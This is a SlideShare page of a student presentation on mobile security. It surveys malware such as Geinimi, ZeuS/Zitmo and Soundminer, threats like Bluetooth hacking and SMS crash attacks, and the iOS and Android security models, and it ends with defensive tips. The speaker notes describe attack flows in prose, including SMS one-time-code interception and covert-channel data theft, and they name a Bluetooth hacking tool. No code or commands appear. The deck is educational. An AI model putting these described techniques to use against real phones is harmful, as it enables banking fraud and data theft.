Your SlideShare is downloading. ×
Cp3201 mobile security final
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×

Saving this for later?

Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime - even offline.

Text the download link to your phone

Standard text messaging rates apply

Cp3201 mobile security final

1,206
views

Published on


0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
1,206
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
38
Comments
0
Likes
1
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide
  • Attackers are no longer targeting web and email servers. Today, they are attacking enterprises from the inside out, by first compromising end user systems and then leveraging them to gain access to confidential data.Integrated functions :
  • Since the introduction of the iPhone, the smartphone market has grown over the last several years. And the introduction of tablet devices such as the Apple iPad, HP Slate and Android-based tablets signals a potential shift in which cybercriminals target end users via mobile platforms. As with other platforms, the attackers will go where the most users are, and where these users are the least protected.
  • Currently, there are more than a million mobile apps available and one billion smartphones in circulation and there is no mandatory information security regulations in place for the distribution of application channels, which will put users at riskAs devices grow more intricate and multi-faceted, they become gold mines for storing, collecting and transmitting confidential data. PDA’s are not alone anymore; Tablets are now also on the radar for malicious malware. Mobile banking and NFC enabled (online banking transactions) payments are beginning to be targeted by cybercriminals, and today’s unregulated virtual infrastructure will demand a plan of action to protect mobile devices.
  • Swop 6 and 7Since we hav e
  • Summarise the cases and incidents slidesMany people is having problem of mobile virus in this time. People are automatic getting virus in their hand sets.Several notable mobile incidents occurred in the later half of 2010.In late September, Zeus in the mobile malware (Zitmo for short) was released to steal financial Credentials (e.g., SMS one--‐time--‐passwords) from Symbian and Blackberry mobile phones3. Shang will be doing further elaboration and demonstration on this attackTrojan variants have been cropping up for Android mobile phones to generate revenue for the criminals by sending SMS/text messages – a third iteration of the “FakePlayer” SMS Trojan was released in early October4. The Geinimi Android Trojan also made headlines toward the End of December – it has botnet characteristics and has been embedded within legitimate applications (particularly Chinese apps) within the Android Marketplace5.
  • A new Trojan horse aimed at Android devices has surfaced in China in 30 December 2010.It is Named “Geinimi” A San Francisco firm Lookout Mobile Security says the Trojan is “the most sophisticated Android malware [the firm has] seen to date.”
  • Firesheep, a Firefox Plugin to conduct “sidejacking” to steal session cookies, was released at the end of October6. While not exactly mobile malware, it is a tool that is particularly useful to obtain unauthorized access to FB or google accounts that are being accessed by users on public Wi-Fi hotspots. Laptops, iPads, and mobile phone accessing the web from a coffee shop (Wi-Fi hotspots) can leak session cookies to anyone listening on the network. These session cookies are then replayed by the attacker to gain access to the victim’s accounts.Firesheep -> dilute Fire Shephard = defense -> it will scan for firesheep, it will flood firesheep back
  • Source:http://www.youtube.com/watch?v=uCyKcoDaofg&feature=related5 min 12 sec13 Investigates explains how your cell phone can be secretly hijacked and used against you - and how to protect yourself. ALSO SEE OUR STORY HERE: http://www.wthr.com/Global/story.asp?S=9346833
  • Good to use the story to make a point
  • Can condense the threatslides
  • Expert predict that the Denial of service will also continue to be a significant threat to VoIP. If a large number of VoIP phones become infected by malware and flood a network with traffic, the results could be extremely disruptive. It isExpected that some cyber criminals to attempt to blackmail carriers based on a DoS attack scenario.
  • Most people have been trained to enter social security numbers, credit card numbers, bank accountnumbers, etc. over the phone while interacting with voice response systems,” “Criminals will exploit this social conditioning to perpetrate voice phishing and identity theft. At the same time, customers will demand better availability from phone service than they would from an ISP, so the threat of a DoS attack might compel carriers to pay out on a blackmail scam.”
  • Put at the end if you have the timehttp://www.youtube.com/watch?v=XlTEIYGk3Ro&feature=related2 min 33 secneed a program called "Super Bluetooth Hack“With the program you can do things on the other phone such as:- read SMS messages - read contacts - change profile - play ringtone (even if phone is on silent)- play songs- restart the phone - turn off the phone - restore factory settings - change ringing volume - call from the other phone (it includes all call functions like hold etc.)
  • 27C3 presentation claims many mobiles vulnerable to SMS attacks'SMS of death' => threatens to disable many current Sony Ericsson, Samsung, Motorola, Micromax and LG mobilessecurity researchers at TU Berlin, claimed that sending malicious text or MMS messages represents a relatively simple means of crashing current mobile phones. Some of the bugs discovered have the potential to cause problems for entire mobile networks.In recent months, the tendency has been for hackers and security testers to focus their efforts on smartphones such as the iPhone or Android-based phones. Most people are still using feature phones, which only runs JAVA based apps. Texting is always supported, as are, usually, additional functions such as the ability to have messages displayed immediately by means of flash texts, to attach a digital business card, to address various ports and to send texts in more than one part.All of these functions are prone to bugshttp://www.h-online.com/security/news/item/27C3-presentation-claims-many-mobiles-vulnerable-to-SMS-attacks-1159568.html
  • IPhone SMS Attack to Be Unleashed at Black Hathttp://www.pcworld.com/businesscenter/article/169245/iphone_sms_attack_to_be_unleashed_at_black_hat.htmla series of malicious SMS messages - a way to crash the iPhone via SMS, and that he thought that the crash could ultimately lead to working attack code.SMS is emerging a promising area of security research, as security researchers use the powerful computing capabilities of the iPhone and Google's Android to take a closer look at the way it works on mobile networks.
  • Good SMS sent outHacker intercepts the SMSMalicious SMS will be received by the intended receiverReceiver’s phone is infected and payload deploy in the name of the senderBecause GSM Encryption/3G can already crack -> http://www.neowin.net/search/news?terms=gsm+cracked
  • Source:http://www.youtube.com/watch?v=uCyKcoDaofg&feature=relatedStory of how your cell phone can be secretly hijacked and used against you. Just a // SEE OUR STORY HERE: http://www.wthr.com/Global/story.asp?S=9346833The solution lies in this software called WaveSecure, you may remember there being a mobile security seminar and the presenter talked about the software being able to “lock and wipe”, “backup and restore” and “locate and track your SIM”.
  • Like the computer viruses, smart phones are being “attacked” by such malicious software which could severely threaten both the users and the usefulness of the phone We will be exploring some common malware in detail to show you what they can doCabir: Infects mobile phones running on Symbian OS. When a phone is infected, the message 'Caribe' is displayed on the phone's display and is displayed every time the phone is turned on. The worm then attempts to spread to other phones in the area using wireless Bluetooth signals
  • Skulls: A trojan horse piece of code. Once downloaded, the virus, called Skulls, replaces all phone desktop icons with images of a skull. It also renders all phone applications, including SMSes and MMSes useless
  • Comwar: First worm to use MMS messages in order to spread to other devices. Thankfully, its limitted to only infecting devices running under OS Symbian Series 60. Can spread through Bluetooth too. The executable worm file once launched hunts for accessible Bluetooth devices and sends the infected files under a random name to various devices.Mobile device users have given rise to a market for third-party applications (such as games and other mobile applications) and with it opened up opportunities for malicious use through web downloads too.ZeuSMitmofromhttp://leonardomusumeci.net/tag/zeus/?lang=enhttp://www.eweekeurope.co.uk/news/bank-site-sms-passcodes-intercepted-by-zeus-trojan-variant-21818Stealing the username or the password is relatively easy, and malware like ZeuS have been doing that for ages (injecting HTML or adding field using JavaScript work like a charm). But now, the trojan will also ask for new details: our mobile vendor, model, and phone number (the website will force you to fill in this information due to its new security measures).
  • Disclaimer:We’re not mobile security experts, please do not fault us if we misunderstand any conceptsUnfortunately, this section may also be a little boring to those who are unable to understand thisSo we’ll be looking at 3 types of malware, 2 of them ZeuS and Geimini were on the news and 1, a research-based data theft mobile malware called Soundminer.
  • Both ZeuS and Geimini were called the “most interesting mobile threats” on CNET in an article published in late 2010.
  • Source: http://www.youtube.com/watch?v=P0J2FSB8OSA
  • Geinimi is a Trojan affecting Android devices emerging through third-party application sources (markets and app-sharing forums), primarily in China. Geinimi is noteworthy as it represents a reasonable jump in capabilities and sophistication over existing Android malware observed to date. The word Geinimi (Ghay-knee-mē) is derived from the name of the first repackaged application it was discovered in. Geinimi is Mandarin Chinese for “give you rice”, essentially slang for “give you money”. The Trojan was originally injected using the package “com.geinimi” but as it spread, subsequent variants took on an obfuscated package scheme.It has the ability to steal your personal data and send it to a remote computer, as well as take commands from a remote server, which would effectively turn your Android device into a zombie inside of a botnet.This Trojan also can:* Read and collect SMS messages* Send and delete selected SMS messages* Pull all contact information and send it to a remote server (number, name, the time they were last contacted)* Place a phone call* Silently download files* Launch a web browser with a specific URLThe detailed description of everything Geinimi can do sounds scary: it can send your location, device identifiers (IMEI and IMSI) and list of installed apps to someone. It can also download an app and prompt the user to install it.While the intent is still undetermined, Geinimi is clearly well equipped to perform malicious activities without a user’s knowledge.Sources:http://www.nsai.it/tag/geinimi-trojan-technical-analysis/http://blog.mylookout.com/2011/01/geinimi-trojan-technical-analysis/http://www.smart-internet.com/blog/2010/12/30/advanced-trojan-could-zombify-your-android-device/Other sources:http://www.androidet.com/security-firm-lookout-dissects-the-geinimi-trojan/http://www.androidet.com/lookout-warning-new-trojan-affecting-android/http://www.androidet.com/lookout-mobile-security-analyzes-that-super-evil-geinimi-trojan/http://nakedsecurity.sophos.com/2010/12/31/geinimi-android-trojan-horse-discovered/Android Phones Hit With A Trojan Virus. http://www.youtube.com/watch?v=fkSEX4Apgfk
  • What ZeuS does?In late September 2010, specialists at S21Sec detected a malicious program capable of forwarding incoming text messages to a specific number. At first, it appeared to be of no particular interest. However, it turned out that this threat was, first of all, connected to the well known Zbot (ZeuS) Trojan, and furthermore, malicious users weren’t interested in all of the text messages — just the ones that contained authentication codes for online banking transactions. Kaspersky Lab labeled this threat Trojan-Spy.SymbOS.Zbot.a.The attack was set up as follows:Zbot steals online banking access data from an infected computer.bAfter confirming the victim’s telephone number, the malicious user sends a text message with a link to a malicious program for smartphones.When a user clicks on the malicious link, they are asked to download an app and can either install it, which launches the Trojan, or decline it.The malicious user then attempts to conduct a transaction via online banking services that require text message confirmation.The bank sends a text message with the authentication code to the victim’s phone number.The malicious program then forwards the incoming message to the malicious user’s phone number.The malicious user obtains the authentication code and completes the online banking transactions.This malicious program also had a legitimate digital signature.Such a complex plan of attack just goes to show that malicious users are constantly broadening their interests. Prior to the detection of this particular threat, text message authentication was one of the last reliable means of protection when conducting banking transactions on the Internet. Now, malicious users have found a way to bypass even this level of security.The Mitmo Zeus Trojan has infected phones to intercept login SMS credentials and access bank accountsSource: http://www.eweekeurope.co.uk/news/bank-site-sms-passcodes-intercepted-by-zeus-trojan-variant-21818Malware authors are already a step ahead with new tricks as more banks and organisations move towards two-factor authentication to secure their Web sites.A mobile variant of the Zeus banking Trojan is targeting ING customers in Poland by intercepting one-time passcodes sent to customer phones via SMS, according to F-Secure. It appears to be the same style of attack as the one discovered byS21sec in September, F-Secure said.The actual analysis of the variant, Zeus in the Mobile (ZitMo), was performed by security consultant PiotrKonieczny on his personal site. Konieczny said customers of Polish bank MBank were also targeted.Clunky But Proves The ConceptMitmo is fairly clunky in its execution, as it requires the user to first download an application to their phone, but attackers are tricking users into thinking it is a critical software update to keep the ability to receive more SMS alerts, Konieczny said. It can affect Symbian and Blackberry devices, said Konieczny, and it was also likely to target Windows Mobile devices, according to Denis Maslennikov, a malware researcher at Kaspersky Lab. The research did not mention Android or iPhones. Apple’s iPhone and other iOS devices may be safe because rogue apps cannot install unless the device has been jailbroken.Considered by security experts to be one of the most sophisticated Trojans, Zeus originally targeted financial institutions by using keyloggers to steal users’ login credentials as they were entered on banking sites. Many banks switched to two-factor authentication to thwart the Trojan, since the one-time passcodes that authorise transactions expire as soon as they are used. Mitmo intercepts the one-time passcodes before they can be used.The most common two-factor authentication method involves sending out mTANs, mobile transaction authentication numbers, via SMS message as a one-time passcode for customers to enter on the Web site. Two-factor authentication combines something the user knows, the password, with something the user has, the phone that receives the SMS message, to tighten security. Google recently rolled out similartwo-factor authentication for Gmail based on one-time passwords.The two-pronged attack begins when Mitmo infects a user’s computer, whether from a spam link, drive-by-download, or some other method, according to Konieczny. When the user then browses to a bank Web site, such as ING, users are shown a “security notification” to update their phone so that it can receive the SMS codes, Konieczny said.The update process asks for mobile phone number and type of mobile device, he said. The Trojan injects HTML fields into the Web site, so there are no changes to the URL nor any changes to the header and footer of the page to hint that the security panel may not be legitimate, he said. Users do not realise the notification is not real and think they are enhancing their security by providing the information.Once the attackers have the information, they send a SMS to the user with a link to some other Web site which downloads an app to the device. The app is claimed to be part of the security update so that users would be able to receive the passcodes. Once installed, the mobile app intercepts all SMS sent to the phone and forwards to another phone number, giving the attacker access to the user’s bank information and any other site that sends information to the mobile device.Mitmo dials back to the same command and control server based out of Great Britain, according to Maslennikov. ING Poland said in an email statement that none of the customer’s accounts have been compromised by Mitmo at this time.
  • SymbOS/Zitmo.A is a mobile spyware application used to intercept and forward the mTAN SMS messages sent from an infected user’s bank to an attacker. It was implemented by the Zeus Trojan for gathering information from victims (= Data theft) about their mobile phones so that it could send a targeted download link to them. The attacker could then change what numbers were monitored by the spyware to go after specific banks. This particular group of crooks was using SymbOS/Zitmo.A in a targeted attack against Spanish banks.
  • Source:http://www.computersecurityarticles.info/antivirus/mcafee/write-once-mobile-malware-anywhere/
  • Source:http://www.computersecurityarticles.info/antivirus/mcafee/write-once-mobile-malware-anywhere/
  • The attacker steals both the online username and password using a malware (ZeuS 2.x)The attacker infects the user's mobile device by forcing him to install a malicious application (he sends a SMS with a link to the malicious mobile application)ZeuSMitmofromhttp://leonardomusumeci.net/tag/zeus/?lang=en
  • The application that the user installs in his mobile device is a simple application that will monitor all the incoming SMS and will install a backdoor to receive commands via SMS. The technique that the malicious application uses for monitoring the incoming SMS without notifying the user is not something advanced (it is using the Symbian API), but allows the trojan to use the SMS stack for its own profit without showing any SMS in the mobile screen:The attacker logs in with the stolen credentials using the user's computer as a socks/proxy and performs a specific operation that needs SMS authenticationAn SMS is sent to the user's mobile device with the authentication code. The malicious software running in the device forwards the SMS to other terminal controlled by the attackerThe attacker fills in the authentication code and completes the operation.
  • OK, now that I’m done with buying time, lets wake up to watch the Soundminer in action.http://www.youtube.com/watch?v=Z8ASb-tQVpU
  • Researchers have developed a low-profile Trojan horse program for Google’s Android mobile OS that steals data in a way that is unlikely to be detected by either a user or antivirus software.The malware, called Soundminer, monitors phone calls and records when a person, for example, says their credit card number or enters one on the phone’s keypad, according to the study.Source: http://gigasite.wordpress.com/category/software/Soundminer uses various analysis techniques, Soundminer trims the extraneous recorded information down to the most essential, such as the credit card number itself, and sends just that small bit of information back to the attacker over the network, the researchers said.“We implemented Soundminer on an Android phone and evaluated our technique using realistic phone conversation data,” they wrote. “Our study shows that an individual’s credit card number can be reliably identified and stealthily disclosed. Therefore, the threat of such an attack is real.”
  • Soundminer is designed to ask for as few permissions as possible to avoid suspicionFor example, Soundminer may be allowed access to the phone’s microphone, but further access to transmit data, intercept outgoing phone calls and access contact lists might look suspicious.So in another version of the attack, the researchers paired Soundminer with a separate Trojan, called Deliverer, which is responsible for sending the information collected by Soundminer.Since Android could prevent that communication between applications, the researchers investigated a stealthy way for Soundminer to communicate with Deliverer. They found what they term are several “covert channels,” where changes in a feature are communicated with other interested applications, such as vibration settings.http://gigasite.wordpress.com/category/software/
  • Using the covert channels of viberation settings, Soundminer could code its sensitive data in a form that looks like a vibration setting but is actually the sensitive data, where Deliverer could decode it and then send it to a remote server. That covert vibration settings channel only has 87 bits of bandwidth, but that is enough to send a credit card number, which is just 54 bits, they wrote.If it is installed on a device, users are likely to approve of the settings that Soundminer is allowed to use, such as the phone’s microphone. Since Soundminer doesn’t directly need network access due to its use of a covert side channel to send its information, it is unlikely to raise suspicion.In fact, 2 antivirus programs for Android, VirusGuard from SMobile Systems and Droid Security’s AntiVirus, both failed to identify Soundminer as malware even when it was recording and uploading data, according to the researchers.In an e-mail statement, Google officials in London did not directly address Soundminer but said that Android is designed to minimize the impact of “poorly programmed or malicious applications if they appear on a device.”“If users believe an application is harmful or inappropriate, they can flag it, give it a low rating, leave a detailed comment, and of course, remove it from their device,” Google said. “Applications deemed to be in violation of our policies are removed from Market, and abusive developers can also be blocked from using the Android Market for repeated or egregious violations of our policies.”http://gigasite.wordpress.com/category/software/
  • So now that we know much more about howmobile attacks, lets look at the security models that the organisations which built these systems provide.
  • The security of iOS is really provided by the lack of application choice. All applications are supposed to be loaded from the Apple App Store, and Apple uses human review, static and dynamic analysis to look for potentially malicious actions by uploaded apps. You are not allowed to sideload applications from the Internet or your PC, so in theory every bit of executable code your phone is exposed to has passed by Apple's gatekeepers. In reality, mobile Safari has had hundreds of vulnerabilities and the sandbox mechanism is regularly defeated, as evidenced by the success of enthusiasts in creating jailbreak software for pretty much every version of iOS. Android was always intended to allow users to load software from untrusted sources, so the security model needed to be "collapsed" onto the phone and can't rely on external review processes. An non-jailbroken phone includes runtime Code Signing Enforcement, which makes exploitation of memory corruption vulnerabilities significantly more difficult as you cannot execute injected code.  This is a significantly stronger defense than the non-executable memory protections on other systems (i.e. DEP, NX/XD, PaX PAGEEXEC, etc).  It is always possible to achieve the same effects using return-oriented programming, but significantly more labor intensive (especially if you need to do loops or conditionals). On Android, you may simply execute the injected shellcode that the exploit has sprayed onto the heap.Given that both Android and iOS use the same WebKit library for their browsers, developing the exploit against iOS will take at least an order of magnitude longer than developing the exploit against Android for the same vulnerability.  In both cases, the attacker will likely also have to exploit a kernel vulnerability in order to escalate privileges and modify the device. Since they also have roughly the same marketshare currently, the rational attacker will attack the platform that provides the greatest return on their time investment.From Quora discussion: http://www.quora.com/Which-platform-is-more-vulnerable-to-viruses-iOS-or-Android
  • iOS runs all applications as the same user, and utilizes a kernel-level mandatory access control mechanism known as "SeatBelt" to limit interaction between applications. While SeatBelt policies could, in theory, be customized for each downloaded application, in practice customization is only used for a handful of pre-loaded apps (like mobile Safari) and all downloaded apps run with the same set of permissions. This set of permissions is not visible to users, and the standard seatbelt policy has actually become more permissive as the platform has evolved, with iOS 4 granting many more rights than iPhone OS 2.Because of the freedom Google gives to the Android market, the Android’s security model needs to be "collapsed" onto the phone and can't rely on external review processes which are non-existent in this case. Every application on Android is assigned it's own uid on install, and by default the application's user is granted no rights outside of access to it's home directory, the ability to execute itself and write to the screen. Android applications request permissions to perform other actions, like access the network, use the Bluetooth stack, make phone calls or read the user's contacts. The user needs to approve these permissions on install, and a lot of work has gone into designing a UX that makes this decision easier to understand while not "lying" to the user. A handful of these permissions are enforced in the Linux kernel by use of group membership by each app's user, but the majority of them are enforced on IPC calls between the application and services that provide these abilities.From Quora discussion: http://www.quora.com/Which-platform-is-more-vulnerable-to-viruses-iOS-or-Android
  • It is more likely that an Android phone will be exposed to malicious software than a non-jailbroken iPhone, due to its rigorous screening processes, because the Android market is not as controlled and the user can download applications whenever he/she pleases. If you were trying to attack a fully patched Android phone and a fully patched iPhone, then the iPhone is probably the softer target, especially if you can get the user to navigate to a malicious page using Safari. In this way, Android and iOS play out the Windows/OS X security drama in miniature and reflect the difference between security and safety. The former OSes are like very secure homes in bad neighborhoods, the Apple OSes are like mansions with unlocked front doors in much safer neighborhoods.Takes on the “Prevention is better than cure” philosophyLike a “kaisu” overly concern parent of a very young babySecurity model is more catered to geeks as a whole as it Like a parent of a teenager, giving them the freedom to make their own choices and mistakesFrom Quora discussion: http://www.quora.com/Which-platform-is-more-vulnerable-to-viruses-iOS-or-Android
  • Trend Micro releases Android security app, says iOS is more secure http://www.techspot.com/news/41951-trend-micro-releases-android-security-app-says-ios-is-more-secure.html
  • http://adtmag.com/articles/2011/03/03/android-attacks-on-rise.aspx?utm_source=2359_Media&utm_campaign=86404dbd86-Daily_Newsletter_0703111&utm_medium=emailhttp://www.zdnet.com/blog/btl/googles-android-wears-big-bulls-eye-for-mobile-malware/45733http://www.appleinsider.com/articles/10/07/29/millions_of_android_users_hit_by_malicious_data_theft_app.html
  • But having said all these -> going back to the iPhone vs Android’s security modelYou must understand that implementing mobile security solutions is a delicate balance and we must have a delicate balance between making restrictions and open platformsWill Android still allowAllow self-signed apps?Allow non-official app repositories?Allow free interaction between apps?***And also Google must consider the consequences as many Android users chose this platform because of the freedom it gives its users.Allow users to override security settings?Allow users to modify system/firmware?
  • Do not use any virus inflected system or device inflected with malware for exchanging data…it’ll only make things worse…of cause, that’s if you know its inflectedAfter using blue tooth, de-activate your blue tooth instantly. Don‘t leave it on and bring it wherever you go!De-activate your infrared function. Don‘t leave it on and bring it wherever you go!When you register in few sites then those sites send you confirmation or verification to your mobile phone. Always check the site is safe or not then click ok.While saving the data, check it with Antivirus Software.Ignore SMS, if you don’t know the sender.Use mobile antivirus.
  • Some future attack concerns-> just a tribute to my bro there, the guys Justin, Jun Ming and Jeremy who suggested thisDuring mobile firmware update, could the virus be installed already on the firmware?This means that the firmware which people load into the phone would already have a “preloaded” virus Crackers could hack the source servers of the Google Android system or iPhone system or use a man-in-mobile attack
  • Some future attack concerns-> just a tribute to my bro there, the guys Justin, Jun Ming and Jeremy who suggested thisDuring mobile firmware update, could the virus be installed already on the firmware?This means that the firmware which people load into the phone would already have a “preloaded” virus Crackers could hack the source servers of the Google Android system or iPhone system or use a man-in-mobile attack
  • Transcript

    • 1. Ong Howe Shang
      KohJyeYiing
      Mobile Security - Malwares
    • 2. Agenda
      Current Trends
      Threats:
      Denial of Service to VoIP
      Bluetooth Hacking
      SMS viruses
      Man-in-mobile attacks
      Mobile eavesdropping
      Data Theft
      Mobile Viruses:
      Soundminer
      Zeus
      Geimini
      Solutions
    • 3. Current Trends
      Increasing number of mobile phone user-base
      Capabilities of smart phones
      mCommerce
      Mobile vouchers, coupons and loyalty cards
      Mobile marketing and advertising
      Mobile Browsing
      mWallets
      mobile identity
    • 4. Current Trends
      Growth of smartphone market:
      Source take from M86 Security Labs: Threat Predictions 2011
    • 5. Current Trends
      More than a million mobile apps available and one billion smartphones in circulation
      No mandatory information security regulations
      Factors for the increase in mobile malware:
      Mobile devices becoming gold mines for storing, collecting and transmitting confidential data.
      Mobile banking and NFC enabled (online banking transactions) payments are beginning to be targeted by cybercriminals
    • 6. Current Trends-
      Growth of mobile malware:
      Source take from Malware goes Mobile Novemeber 2006
    • 7. Cases and Incidents
      Case 1:
      In late September 2010, ZeuS was released to steal financial credentials . The virus can infect the mobile device and sniff all the SMS messages
      Case 2:
      4th October 2010, a 3rd iteration of “FakePlayer” SMS Trojan was release to Android mobile phones.
    • 8. Cases and Incidents
      Case 3:
    • 9. Cases and Incidents
      Case 4:
      End of 6 October, a Firefox plugin name “Firesheep” was released to conduct “sidejacking” to steal session cookies
      Critical when users use iPads and mobile to accessed web through public Wi-Fi hotspots
    • 10. Case 5: Identity theft, stalking and bullying
      Cases and Incidents
    • 11. Story on how the mobile virus spreads
    • 12. Story on how the mobile virus spreads
    • 13. Story on how the mobile virus spreads
    • 14. Story on how the mobile virus spreads
    • 15. Story on how the mobile virus spreads
    • 16. Story on how the mobile virus spreads
    • 17. Story on how the mobile virus spreads
    • 18. The Changing Threat Environments
    • 19. Threat: Denial of service to VoIP
      Tom Cross - X-Force Researcher , IBM Internet Security Systems) said:
      “Criminals know that VoIP can be used in scams to steal personal and financial data so voice spam and voice phishing are not going away”
    • 20. Threat: Denial of service to VoIP
      People are trained to enter social security numbers, credit card numbers, bank account numbers over the phone
      Criminals will exploit this social conditioning to perpetrate voice phishing and identity theft
      Customer demand better availability from phone service than they would from an ISP
       Threat of a DoS attack might compel carriers to pay out on a blackmail scam.
    • 21. Bluetooth hacking
    • 22. Threat: SMS Viruses
      Known as the ‘SMS of death’
      Threatens to disable many Sony Ericsson, Samsung, Motorola, Micromax and LG mobile phones
      It’s payload?
      A simple malicious text or MMS messages which it sends
      What it results in?
      crashing of mobile phones
      Some of the bugs discovered have the potential to cause problems for entire mobile networks.
    • 23. Threat: SMS Viruses
      iPhone SMS attack
      a series of malicious SMS messages - a way to crash the iPhone via SMS, and that he thought that the crash could ultimately lead to working attack code.
      Results from a bug in the iPhone iOS software that could let hackers take over the iPhone, just by sending out and SMS message
    • 24. Threat: Man-in-mobile attacks
      Man-in-mobile works by
    • 25. Threat: Mobile eavesdropping
      FBI taps cell phone mic as eavesdropping tool
      The technique is called a "roving bug“
      Use against members of a crime family who were wary of conventional surveillance techniques such as tailing a suspect or wiretapping him.
      "functioned whether the phone was powered on or off."
    • 26. Threat: Data Theft
      Data theft is the leaking out of information on the mobile phones.
      Stolen
      Remember this story
      From just now?
      Solution lies in TenCube’sWaveSecure
    • 27. Threat: Mobile Malware
      Smart phones are being “attacked” by malicious software which could severely threaten both the users and the usefulness of the phone
      Malwares:
      Cabir:
      Infects Symbian OS mobile phones
      Infected phone displays the message 'Caribe’
      The worm attempts to spread to other phones via wireless Bluetooth signals
    • 28. Threat: Mobile Malware
      Skulls:
      Infects all types of mobile phones
      Trojan virus replaces all phone desktop icons with images of a skull
      Renders all applications
    • 29. Threat: Mobile Malware
      CommWarrior:
      First worm to use MMS messages in order to spread to other devices
      Infects devices running under OS Symbian Series 60
      Spreads through Bluetooth
      ZeuSMitmo
      Steals username and passwords
      Injecting HTML or adding field using JavaScript
    • 30. Agenda
      Current Trends
      Cases and Incidences
      Threats:
      Denial of Service to VoIP
      Bluetooth Hacking
      SMS viruses
      Man-in-mobile attacks
      Mobile eavesdropping
      Data Theft
      Mobile Viruses:
      Soundminer
      Zeus
      Geimini
      The difference between Apple and
      Android’s security model
      Solutions
    • 31. Agenda
      Current Trends
      Cases and Incidences
      Threats:
      Denial of Service to VoIP
      Bluetooth Hacking
      SMS viruses
      Man-in-mobile attacks
      Mobile eavesdropping
      Data Theft
      Mobile Viruses:
      Soundminer
      Zeus
      Geimini
      The difference between Apple and
      Android’s security model
      Solutions
    • 32. Taking a closer look at the viruses we’ve been studying
    • 33. Geimini and ZeuS in the news
    • 34. Geimini on the news
    • 35. Geimini
      Geinimi is a Trojan affecting Android devices
      emerging through third-party application sources
      Geinimi, means “give you rice” (Ghay-knee-mē) in chinese, which is essentially slang for “give you money”
      Geinimi can
      Read and collect SMS messages
      Send and delete selected SMS messages
      Pull all contact information and send it to a remote server (number, name, the time they were last contacted)
      Place a phone call
      Silently download files
      Launch a web browser with a specific URL
    • 36. ZeuS
      Malicious users weren’t interested in all of the text messages — just the ones that contained authentication codes for online banking transactions
      The attack’s set up
      This shows that malicious users are constantly broadening their interests. Prior to this, text message authentication was a reliable form of online banking transactions
      Now, malicious users have found a way to bypass even this level of security.
    • 37. ZeuSSymbOS/Zitmo.A = SMS Viruses
      SMS viruses are part of the Zeus Trojan’s payload
      Called the SymbOS/Zitmo.A
      Implemented for gathering information from victims
      So it could send a targeted download link to them
      Send an mTAN SMS messages sent from an infected user’s bank to an attacker
      The attacker could then change what numbers were monitored by the spyware to go after specific banks
    • 38. SymbOS/Zitmo.A
      What we find interesting is that the SymbOS/Zitmo.A virus is great at avoiding detection!
      • Symbos/Zitmo.B process running on a Symbian phone. The spyware does not show a GUI.
      • 39. MSIL/Zitmo.B running on device. The spyware does not show a GUI.
    • The bank (account) robbers have not stopped at their first mobile spyware attempt.  This time around the thieves went after bank accounts in Poland.
      They created the latest update: MSIL/Zitmo.B
      Works for Windows Mobile or other .Net Compact Framework and
      SymbOS/Zitmo.B
      Latest news on SymbOS/Zitmo.A
    • 40. How ZeuSSymbOS/Zitmo.A works? (1)
      Trojan ask for new details in website: mobile vendor, model, phone number
      Send SMS to mobile device with a link to download
      http://securityblog.s21sec.com/2010/09/zeus-mitmo-man-in-mobile-i.html
    • 41. How ZeuSSymbOS/Zitmo.A works? (2)
      Backdoor installed to receive commands via SMS
      Send commands for SMS attacks for own profit (SMS charges)
    • 42. Now to watch the Soundminer demo
    • 43. Soundminer (1)
      Low-profile Trojan horse virus for Android OS
      Steals data => unlikely to be detected
      Soundminer
      Monitors phone calls
      Records credit card number
      Uses various analysis techniques
      Trims the extraneous recorded information down to essential credit card number
      Send information back to the attacker over the network
    • 44. Soundminer (2)
      Designed to ask for as few permissions as possible
      Soundminer is paired with a separate Trojan, Deliverer => responsible for sending the information
      Android OS security mechanisms could prevent communication between applications
      Communicates via “covert channels”
      vibration settings
    • 45. Soundminer (3)
      Code sensitive data in a form of vibration settings
      Unlikely to raise suspicion
      Two antivirus programs, VirusGuard and AntiVirus, both failed to identify Soundminer as malware
      Study by Kehuan Zhang, Xiaoyong Zhou, MehoolIntwala, ApuKapadia, XiaoFeng Wang called Soundminer: A Stealthy and Context-Aware Sound Trojan for Smartphones
    • 46. iOS and Android’s Security Models
    • 47. Security Models: iOSvs Android
    • 48. Security Models: iOSvs Android
    • 49.
    • 50. Security Models: iOSvs Android
      Trend Micro believes the iOS security model is better
    • 51. Security Models: iOSvs Android
      Many believe the iOS security model is better just because Android’s model is receiving a lot of bad press.
    • 52. Solutions we believe to be useful for Android
    • 53. Solutions (1)
      Either create a strict app filtering process like how Apple’s AppStore does it or create a market crawling tool to look for potential malicious apps
      With more granular permissions
      All the viruses could be prevented
      Or at least disclosed to user at install time
      Sandboxing to the rescue
      Browser -> still a big deal
      Media player -> not catastrophic
      Crowd-sourcing -> getting people to report
    • 54. Solutions (2)
      Protection is system-level, not app-level
      Bad considering proliferation of rooted phones
      Combined with 24 hour refund
      Likely to see pirated apps distributed in near future
      Third-party protection available
      Eg. SlideLock and Lookout
    • 55. Back to the iPhone vs Android’s security model
      Mobile security is a delicate balance
      restricted vs. open platforms
      Allow self-signed apps?
      Allow non-official app repositories?
      Allow free interaction between apps?
      Allow users to override security settings?
      Allow users to modify system/firmware?
      Financial motivations
    • 56. Some Simple Tips And Tricks
      Do not use any device inflected with malware for exchanging data.
      De-activate after using blue tooth.
      De-activate your infrared function.
      After registering, in few sites then those sites send you confirmation or verification to your mobile phone. Always check the backgroundbefore registering on any web sites is safe or not then click ok.
      While saving the data, check it with Antivirus Software.
      Ignore SMS, if you don’t know the sender.
      Use mobile antivirus.
    • 57. Future Concerns?
      Attack during mobile firmware update
      Firmware loaded into phone
      A “preloaded” virus
      Crackers -> hack the source servers or use a man-in-mobile attack
    • 58. Future Concerns?
    • 59. "There is no security on this earth, there is only opportunity" - General Douglas MacArthur (1880-1964)
      Both JyeYiing and myself would like to thank you for listening!
    • 60. Thank you for listening! Any Questions?